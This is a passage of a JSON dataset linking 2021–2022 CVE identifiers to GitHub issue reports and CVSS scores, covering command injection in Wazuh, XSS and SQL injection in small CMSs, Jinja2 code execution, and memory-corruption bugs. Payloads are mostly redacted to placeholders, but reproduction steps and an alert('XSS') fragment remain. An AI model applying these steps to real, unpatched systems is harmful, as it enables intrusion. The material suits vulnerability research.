        "description": "Dangerous Correlation Between Key Length and Execution Time . Hello. I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu NUMBERTAG The function is as follows: CODETAG It seems that the execution time of APITAG is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet. FILETAG I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption. Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me. Hope you can check this case. Have a good day!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-43518",
        "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2981",
        "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2981",
        "Repo_new": "teeworlds/teeworlds",
        "Issue_Created_At": "2021-10-23T10:33:38Z",
        "description": "Stack buffer overflow (write) while loading map in APITAG APITAG The client crashes when an invalid map ( FILETAG is loaded. Such a map can be delivered to the client by a malicious server. Tested on Ubuntu NUMBERTAG Teeworlds version: APITAG URLTAG Compilation with ASAN: CODETAG Run and connect to a server that delivers an invalid map: ERRORTAG Compilation without ASAN: APITAG Run and connect to a server that delivers an invalid map: APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-43854",
        "Issue_Url_old": "https://github.com/nltk/nltk/issues/2866",
        "Issue_Url_new": "https://github.com/nltk/nltk/issues/2866",
        "Repo_new": "nltk/nltk",
        "Issue_Created_At": "2021-10-26T21:56:15Z",
        "description": "word_tokenize/EN hangs on incorrect strings. Hi NLTK team, I have a string that I pass to APITAG (which uses ERRORTAG under the hood), and the call hangs. The string in question is taken from Wikipedia and is the result of some vandalism. It can be generated by this APITAG The call seems to hang, I did not go deep too much but after running this for a couple of hours I just stopped the process. What would be an ok solution to process this in a robust fashion? I have a pipeline that has correct sentences as well as, from time to time, this kind of sentences.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44079",
        "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/10858",
        "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/10858",
        "Repo_new": "wazuh/wazuh",
        "Issue_Created_At": "2021-11-16T09:26:07Z",
        "description": "Active response tools allow arbitrary code execution. APITAG APITAG APITAG APITAG NUMBERTAG Active response script | APITAG | Packages | APITAG NUMBERTAG This issue was reported by MENTIONTAG We found a command injection bug in the active response script FILETAG . The alert json data is put in the shell command line as POST body for curl : CODETAG However the raw log line which could be partially controlled by attacker is also included in the the json data. Single quote in json is not escaped and therefore could be used to truncate the command: APITAG Steps to reproduce as follows. First, we add the APITAG active response in the config: CODETAG Then we setup a web server on the client machine, and send request with crafted User Agent: APITAG The shellshock APITAG will trigger an alert, and the crafted User Agent value which is contained in web server access.log would also be included in the command line as follows: CODETAG Here we use the single quote to jump out of APITAG and inject the command APITAG with semicolons. We can verify that on the server where the APITAG is running(the wazuh manager machine in this case since we set the location as server in the active response config): APITAG Special thanks to MENTIONTAG for detecting and reporting this issue to the team.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44081",
        "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1206",
        "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1206",
        "Repo_new": "open5gs/open5gs",
        "Issue_Created_At": "2021-10-18T14:24:48Z",
        "description": "Version NUMBERTAG AMF stack smashing . When I use open5gs of version NUMBERTAG on Ubuntu NUMBERTAG system, I found a problem: When the UE is in initially registered period, if the length of MSIN\uff08part of Supi\uff09 exceeds the normal length by NUMBERTAG characters, AMF stack smashing will be caused, resulting in denial of AMF service FILETAG I analyzed the causes of this problem: When open5gs handles the APITAG process, the requested space size is fixed\uff08OGS_MAX_IMSI_BCD_LEN is NUMBERTAG and AMF does not verify the length of Supi APITAG leads to stack overflow FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44124",
        "Issue_Url_old": "https://github.com/vext01/hiby-issues/issues/9",
        "Issue_Url_new": "https://github.com/vext01/hiby-issues/issues/9",
        "Repo_new": "vext01/hiby-issues",
        "Issue_Created_At": "2021-08-29T17:42:19Z",
        "description": "Path traversal vulnerability in web server.. The web server used to upload music on Hiby OS devices doesn't protect against path traversal using APITAG . The vulnerability has already been publicly disclosed here: URLTAG This is still present in the latest NUMBERTAG firmware for the R3 Pro.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44657",
        "Issue_Url_old": "https://github.com/pallets/jinja/issues/549",
        "Issue_Url_new": "https://github.com/pallets/jinja/issues/549",
        "Repo_new": "pallets/jinja",
        "Issue_Created_At": "2016-02-23T09:38:45Z",
        "description": "Execute arbitrary codes in template without sandbox environment.. When i use Jinja2 template framework in my project, i found a way to call APITAG or another functions without global register. It's easy to get shell when attacker can control the template content. Is that such a design? APITAG ERRORTAG I test this code with python NUMBERTAG and Jinja NUMBERTAG if it works will print your user's uid...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45326",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4838",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4838",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2018-09-01T00:19:24Z",
        "description": "APITAG CSRF checks on GET routes. The Vulnerabilities on GET Routes For historical reasons some GET routes in Gitea do more than getting info and actually change state, for example /user/logout, and GET routes with action/:action in it. Current CSRF handler only checks POST routes, and thus leaves those GET routes vulnerable. One particular route PATHTAG should probably be a POST i/o GET route. Strategies We are working on a PR to address these vulnerabilities, and would like the community feedback on the best strategy. Option NUMBERTAG reuse existing CSRF token + referrer policy header In this option we will append the existing CSRF token to vulnerable GET routes as a query string, validate the token. A referrer policy header can be set to same origin to prevent abuse of the token. This option has less changes to existing code. Option NUMBERTAG generate a new JWT token with a key exclusive for this purpose In this option we will generate a new JWT token and send to the browser via a new cookie. This will have more changes to the code. Questions security concerns on reusing csrf token on URL We are thinking to implement option NUMBERTAG and have code already done. It has less code changes and hopefully can be merged soon. Are there any concerns on this option NUMBERTAG response code or redirect What should we do if the required token is missing or invalid? Should we redirect to home page, or return NUMBERTAG Browsers treat NUMBERTAG error code differently, for example Chrome on Mac displays the following message which may not be what you want. CODETAG Potential Impact Both options require an extra handler on vulnerable routes to check the token in query string, and minor changes in URL in templates. While the PR can include the new token in default templates, this is potentially a breaking change to people using custom templates. The custom templates need to be updated to include the token in generated URL.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45357",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1582",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1582",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-12-15T13:48:11Z",
        "description": "FILETAG it just handle GET, POST, COOKIE\uff0cthen we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an APITAG login is also the same)\uff0cin ERRORTAG ERRORTAG After that, let's see what the APITAG function does in ERRORTAG in this APITAG is no filter parameter APITAG FILETAG then execute serialize and pwg_db_real_escape_string functions respectively FILETAG look at APITAG just prevent sql injection ERRORTAG then we register a user APITAG FILETAG then we click logout FILETAG then we just post like this\uff0cIt is best to send more packages FILETAG CODETAG Next, after the system administrator has logged in\uff0cand visit APITAG FILETAG and look it FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45864",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/476",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/476",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-10-18T14:12:22Z",
        "description": "segmentation fault in APITAG APITAG Hi, I found a segmentation fault. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer APITAG POC FILETAG ASAN output: ERRORTAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-46398",
        "Issue_Url_old": "https://github.com/filebrowser/filebrowser/issues/1621",
        "Issue_Url_new": "https://github.com/filebrowser/filebrowser/issues/1621",
        "Repo_new": "filebrowser/filebrowser",
        "Issue_Created_At": "2021-10-16T16:07:16Z",
        "description": "Security Issue APITAG details and report are not disclosed here). Hi, this is Febin, an Independent security researcher. I have found a critical vulnerability in filebrowser. I reported the vulnerability to EMAILTAG from FILETAG . I also reported a private report on the issue via APITAG Link to the Private Report: URLTAG URLTAG Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-0341",
        "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1102",
        "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1102",
        "Repo_new": "vanessa219/vditor",
        "Issue_Created_At": "2021-10-21T10:02:39Z",
        "description": "\u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f\u4f20\u5165\u5b57\u7b26\u4e32 APITAG \u62a5\u9519. \u7f16\u8f91\u6a21\u5f0f wysiwyg \u6240\u89c1\u5373\u6240\u5f97\u6a21\u5f0f \u63cf\u8ff0\u95ee\u9898 APITAG APITAG \u65f6\u62a5\u9519 markdown APITAG APITAG ') \u671f\u5f85\u7684\u7ed3\u679c \u4e0d\u62a5\u9519\uff0c\u4ee3\u7801\u6b63\u5e38\u6267\u884c \u622a\u5c4f\u6216\u5f55\u50cf FILETAG \u7248\u672c\u4fe1\u606f \u7248\u672c\uff1a\"vditor\": APITAG \u64cd\u4f5c\u7cfb\u7edf\uff1amacbook pro \u6d4f\u89c8\u5668\uff1a\u8c37\u6b4c",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-0764",
        "Issue_Url_old": "https://github.com/strapi/strapi/issues/12879",
        "Issue_Url_new": "https://github.com/strapi/strapi/issues/12879",
        "Repo_new": "strapi/strapi",
        "Issue_Created_At": "2022-03-17T15:16:11Z",
        "description": "NUMBERTAG Fix CVETAG . APITAG Bug report Describe the bug There is a security vulnerability in Strapi that prevents our deployment pipeline from running. There is already a fix implemented for NUMBERTAG but upgrading is not on our short term road map for now. It seems like the fix from NUMBERTAG can be copied to NUMBERTAG on NUMBERTAG but since I've never contributed to this repository I was hoping there was someone willing to back port the fix to NUMBERTAG Other information Vulnerability on APITAG [ CVETAG URLTAG Explanation on APITAG URLTAG Commit to NUMBERTAG that fixes the issue: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.7,
        "impactScore": 5.9,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2022-1515",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/186",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/186",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2022-02-17T16:21:15Z",
        "description": "Memory leaks in APITAG Hi, this is an issue found by fuzzing the current master branch, use the OSS Fuzz harness compiled with APITAG and APITAG to reproduce. The memory leak is in APITAG the reported sanitizer error is the following: ERRORTAG I attach a testcase that trigger the bug in a tar.gz. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-2274",
        "Issue_Url_old": "https://github.com/openssl/openssl/issues/18625",
        "Issue_Url_new": "https://github.com/openssl/openssl/issues/18625",
        "Repo_new": "openssl/openssl",
        "Issue_Created_At": "2022-06-22T08:51:51Z",
        "description": "A NUMBERTAG specific heap buffer overflow with NUMBERTAG release. Build APITAG NUMBERTAG on a CPU with A NUMBERTAG my CPU is a Core i NUMBERTAG G7) with: APITAG Run a test: APITAG The sanitizer complains: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23562",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/52676",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/52676",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2021-10-26T11:38:05Z",
        "description": "Undefined behaviour in Range. APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG No OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG all Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: n/a APITAG installed from (source or binary): source APITAG version (use command below): git HEAD Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source NUMBERTAG APITAG version: n/a GPU model and memory: n/a You can collect some of this information using our environment capture FILETAG You can also obtain the APITAG version with NUMBERTAG TF NUMBERTAG APITAG NUMBERTAG TF NUMBERTAG APITAG Describe the current behavior URLTAG has undefined behaviour when size is greater than APITAG This leads to the unit test APITAG failing on AARCH NUMBERTAG where the g++ implements different behaviour from NUMBERTAG On NUMBERTAG the result of the cast is large and ve, on AARCH NUMBERTAG it is large and +ve. Neither is incorrect as the behaviour of casting into a type that cannot hold the value is undefined. Describe the expected behavior The code should be written to avoid relying on undefined behaviour of the source. Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): Test the variable 'size' for exceeding the greatest possible value that can be safely cast to int NUMBERTAG t and throw an error if found. Standalone code to reproduce the issue Provide a reproducible test case that is the bare minimum necessary to generate the problem. If possible, please share a link to PATHTAG notebook. $ bazel test flaky_test_attempts NUMBERTAG test_output=all cache_test_results=no remote_http_cache=\"\" remote_cache_proxy=\"\" noremote_accept_cached config=nonccl verbose_failures PATHTAG Other info / logs Include any logs or source code that would be helpful to diagnose the problem. If including tracebacks, please include the full traceback. Large logs and files should be attached. APITAG ERROR: APITAG APITAG APITAG Traceback (most recent call last): File PATHTAG line NUMBERTAG in APITAG v = APITAG NUMBERTAG e NUMBERTAG limit NUMBERTAG File PATHTAG line NUMBERTAG in error_handler return fn( args, kwargs) File PATHTAG line NUMBERTAG in op_dispatch_handler return dispatch_target( args, kwargs) File PATHTAG line NUMBERTAG in range return APITAG limit, delta, name=name) File PATHTAG line NUMBERTAG in _range APITAG name) File PATHTAG line NUMBERTAG in raise_from_not_ok_status raise APITAG from None pylint: disable=protected access ERRORTAG OOM when allocating tensor with shape NUMBERTAG and type float on PATHTAG by allocator cpu APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-24191",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/470",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/470",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2022-01-25T18:17:46Z",
        "description": "Heap Overflow in gif_read_lzw. Due to an infinite loop in the APITAG function, the sp variable which belongs heap memory can be arbitrarily modified. The crash happens in this loop: CODETAG FILETAG As sp is consistently incremented, it reaches out of heap memory which causes the crash: sp towards the start of execution: FILETAG sp once the crash happened: FILETAG You can download and attempt the following POC: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-24859",
        "Issue_Url_old": "https://github.com/py-pdf/PyPDF2/issues/329",
        "Issue_Url_new": "https://github.com/py-pdf/pypdf/issues/329",
        "Repo_new": "py-pdf/pypdf",
        "Issue_Created_At": "2017-02-17T11:55:45Z",
        "description": "Manipulated inline images can force APITAG into an infinite loop. When you try to get the content stream of FILETAG , APITAG will end up in an infinite loop. So this is probably a security issue because it might be possible to denial of service applications using APITAG The reason is that the last while loop in APITAG URLTAG only terminates when it finds the EI token, but never actually checks if the stream has already ended. So it's as simple as adding a (broken) inline image that doesn't have an EI token at all, like the attached PDF. You can see the infinite loop by running this test script with the attached PDF: CODETAG I will soon prepare a pull request that fixes this issue.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-25413",
        "Issue_Url_old": "https://github.com/maxsite/cms/issues/484",
        "Issue_Url_new": "https://github.com/maxsite/cms/issues/484",
        "Repo_new": "maxsite/cms",
        "Issue_Created_At": "2022-02-17T15:24:21Z",
        "description": "Stored Cross Site Scripting (XSS) APITAG NUMBERTAG Stored Cross Site Scripting (XSS)(authenticated) a stored cross site scripting (XSS) in maxsite cms version NUMBERTAG targeted towards web admin through PATHTAG at via the parameter f_tags NUMBERTAG Navigate to admin page, PATHTAG and make a new page NUMBERTAG click in NUMBERTAG insert xss payload APITAG in the parameter f_tags FILETAG NUMBERTAG click save You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time APITAG payload gets executed successfully and we'll get a pop up. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25488",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/257",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/257",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-02-16T14:04:25Z",
        "description": "Unauthorized Sql Injection in PATHTAG . poc ERRORTAG the APITAG output can be found in html source APITAG analysis file PATHTAG line NUMBERTAG without any filter to protect APITAG repair suggestion add some filter about id",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25489",
        "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/258",
        "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/258",
        "Repo_new": "thedigicraft/atom.cms",
        "Issue_Created_At": "2022-02-16T15:32:48Z",
        "description": "Reflected XSS attack in FILETAG with the a parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in FILETAG exp APITAG APITAG analysis FILETAG line NUMBERTAG without any filter. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25514",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1286",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1286",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-16T15:20:17Z",
        "description": "heap buffer overflow in function APITAG at APITAG . Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25515",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1288",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1288",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-16T15:32:13Z",
        "description": "heap buffer overflow in function APITAG at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function APITAG at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25516",
        "Issue_Url_old": "https://github.com/nothings/stb/issues/1287",
        "Issue_Url_new": "https://github.com/nothings/stb/issues/1287",
        "Repo_new": "nothings/stb",
        "Issue_Created_At": "2022-02-16T15:29:22Z",
        "description": "heap buffer overflow in function stbtt__find_table at APITAG Describe A heap buffer overflow was discovered in stb_truetype. The issue is being triggered in function stbtt__find_table () at APITAG To Reproduce test program ERRORTAG Compile test program with address sanitizer with this command: APITAG You can get program here URLTAG Asan Reports APITAG Get APITAG reports ERRORTAG Poc Poc file is here URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-26127",
        "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10487",
        "Issue_Url_new": "https://github.com/frrouting/frr/issues/10487",
        "Repo_new": "frrouting/frr",
        "Issue_Created_At": "2022-02-03T02:44:29Z",
        "description": "Miss a check on length in Babel. The code below misses a check on the relationship between packetlen and bodylen before Line NUMBERTAG which may lead to buffer overflows when accessing the memory at Line NUMBERTAG and Line NUMBERTAG URLTAG To fix, we may put the code below before the while loop: ERRORTAG The output of the address sanitizer: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26246",
        "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/15",
        "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/15",
        "Repo_new": "xiweicheng/tms",
        "Issue_Created_At": "2022-02-23T08:11:56Z",
        "description": "There is a cross site scripting vulnerability exists in tms. FILETAG APITAG JS code in the form: APITAG alert (\"XSS\") APITAG FILETAG FILETAG APITAG Save to trigger a pop up window, and the loophole reappearance is completed. FILETAG APITAG cause of the vulnerability is that the input data is not filtered in the foreground page PATHTAG createorupdate, and the input parameters are directly passed into the setting method of APITAG and executed. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-28049",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/473",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/473",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-02-17T15:51:14Z",
        "description": "Null pointer dereference in APITAG Hi, this bug was found by fuzzing the current master branch, to reproduce build the OSS Fuzz harness with APITAG and APITAG The bug is a write to a NULL pointer, this is the sanitizer report: ERRORTAG I attach the crashing testcase in a tar.gz, you can run it simply giving the testcase as first argument to the harness. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-28368",
        "Issue_Url_old": "https://github.com/dompdf/dompdf/issues/2598",
        "Issue_Url_new": "https://github.com/dompdf/dompdf/issues/2598",
        "Repo_new": "dompdf/dompdf",
        "Issue_Created_At": "2021-10-12T14:16:06Z",
        "description": "Remote code execution vulnerability through persisted font. A malicious user is able to use Dompdf to execute code remotely under the following conditions: the Dompdf font directory ( PATHTAG by default) is accessible through the web a remote user is able to inject CSS into a document rendered by Dompdf On a vulnerable system a user can reference a specially crafted font file that is able to pass the initial parsing process, at which time Dompdf persists the font file to the font directory with an extension matching that of the file on the remote system. At this point the user is able to load the persisted file to execute code within the context of the PHP process. Recommended mitigations for Dompdf versions prior to NUMBERTAG move Dompdf and/or the Dompdf font directory outside the web root disable access to remote resources by setting the APITAG option to false sanitize user input Vulnerability details are available on the Positive Security blog URLTAG . Refer to the wiki for additional information on securing Dompdf URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-28990",
        "Issue_Url_old": "https://github.com/wasm3/wasm3/issues/323",
        "Issue_Url_new": "https://github.com/wasm3/wasm3/issues/323",
        "Repo_new": "wasm3/wasm3",
        "Issue_Created_At": "2022-04-07T17:45:08Z",
        "description": "Heap Overflow in WASI read/write API. the WASI API which uses iovs is not check the iovs' buf address and buf length,it would result in out of buffer. run the poc,you will see the memory information leak APITAG If you build with asan,you will see that buffer overflow detected APITAG ./m3 PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f3b4c5ce NUMBERTAG e bp NUMBERTAG ffcdce NUMBERTAG sp NUMBERTAG ffcdce NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f3b4c5ce NUMBERTAG d ( PATHTAG ) ............. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29209",
        "Issue_Url_old": "https://github.com/tensorflow/tensorflow/issues/55530",
        "Issue_Url_new": "https://github.com/tensorflow/tensorflow/issues/55530",
        "Repo_new": "tensorflow/tensorflow",
        "Issue_Created_At": "2022-04-07T13:53:27Z",
        "description": "Test fail on r NUMBERTAG APITAG . APITAG make sure that this is a bug. As per our FILETAG , we only address code/doc bugs, performance issues, feature requests and build/installation issues on APITAG tag:bug_template APITAG System information Have I written custom code (as opposed to using a stock example script provided in APITAG no OS Platform and Distribution (e.g., Linux Ubuntu NUMBERTAG Linux Ubuntu NUMBERTAG Mobile device (e.g. APITAG NUMBERTAG Pixel NUMBERTAG Samsung Galaxy) if the issue happens on mobile device: APITAG installed from (source or binary): source APITAG version (use command below NUMBERTAG ge NUMBERTAG fb9c3ad NUMBERTAG Python version NUMBERTAG Bazel version (if compiling from source NUMBERTAG APITAG version (if compiling from source): gcc APITAG NUMBERTAG ubuntu NUMBERTAG APITAG version: N/A GPU model and memory: N/A Describe the current behavior test fails Describe the expected behavior test passes Contributing URLTAG Do you want to contribute a PR? (yes/no): yes Briefly describe your candidate solution(if contributing): This code URLTAG appears to return an aliased/out of scope value when called from URLTAG from (commenting out this line causes the test to pass) URLTAG Evidence for 'aliased/out of scope 